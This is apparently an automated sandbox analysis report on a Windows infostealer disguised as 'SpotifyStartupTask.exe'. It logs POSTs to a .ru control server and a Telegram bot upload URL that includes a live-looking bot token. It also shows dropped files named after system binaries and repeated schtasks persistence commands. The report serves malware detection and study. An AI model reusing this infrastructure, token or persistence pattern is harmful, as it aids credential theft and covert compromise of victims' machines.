                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continue
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficDNS traffic detected: DNS query: 009383cm.nyashk.ru
                              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                              Source: unknownHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="f6bf5325-8482-421f-8ece-01a42d055ef4"Host: api.telegram.orgContent-Length: 82070Expect: 100-continueConnection: Keep-Alive
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyPZ
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru/
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003013000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://009383cm.nyashk.ru/geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://ac.ecosia.org?q=
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://api.telegram.org/bot
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003109000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhotoX
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: uELXB8QKnR.29.drString found in binary or memory: https://gemini.google.com/app?q=
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://ipinfo.io/country
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1264186462.000000000340C000.00000004.00000800.00020000.00000000.sdmp, SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Rlqiwetw.log.0.dr, LWyBOcEb.log.29.drString found in binary or memory: https://ipinfo.io/ip
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://www.ecosia.org/newtab/v20
                              Source: FOyAMfVNQd.29.dr, uELXB8QKnR.29.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49692 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49695 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49706 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49711 version: TLS 1.2
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\6cb0b6c459d5d3Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\0a9b2f414643b7Jump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\0b4ed68d91a975Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMPJump to behavior
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe 2604FC4DE987995CBC77B46BF86D49466FB65DD7DBEE6B1B89FE343EF9B97617
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\7-Zip\Lang\winlogon.exe 2604FC4DE987995CBC77B46BF86D49466FB65DD7DBEE6B1B89FE343EF9B97617
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\DUQujoOa.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1272295802.000000001B585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs SpotifyStartupTask.exe
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1271550475.000000001B382000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs SpotifyStartupTask.exe
                              Source: SpotifyStartupTask.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: SpotifyStartupTask.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dwm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: PQ4HCWgZazguIsFyU1PhJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dxLy2s6A.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: winlogon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SpotifyStartupTask.exe, VEVhb7XLtaEPLCTTawQ.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@41/60@5/3
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Program Files\7-Zip\Lang\winlogon.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\XUwHpYfn.logJump to behavior
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lyFL9C96UdpRArWkuUmQ
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\AppData\Local\Temp\qfasrhtcJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: SpotifyStartupTask.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 8TW3TyHpGz.29.dr, 0Pf1RKp80Q.29.dr, MnGqFFSc0M.29.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: SpotifyStartupTask.exeVirustotal: Detection: 69%
                              Source: SpotifyStartupTask.exeReversingLabs: Detection: 66%
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile read: C:\Users\user\Desktop\SpotifyStartupTask.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\SpotifyStartupTask.exe "C:\Users\user\Desktop\SpotifyStartupTask.exe"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZ" /sc ONLOGON /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6A" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\DiagTrack\dwm.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Windows\DiagTrack\dwm.exe C:\Windows\DiagTrack\dwm.exe
                              Source: unknownProcess created: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe "C:\Program Files (x86)\google\Update\dxLy2s6A.exe"
                              Source: unknownProcess created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: unknownProcess created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\SpotifyStartupTask.exe C:\Users\user\Desktop\SpotifyStartupTask.exe
                              Source: unknownProcess created: C:\Program Files\7-Zip\Lang\winlogon.exe "C:\Program Files\7-Zip\Lang\winlogon.exe"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeSection loaded: rtutils.dllJump to behavior
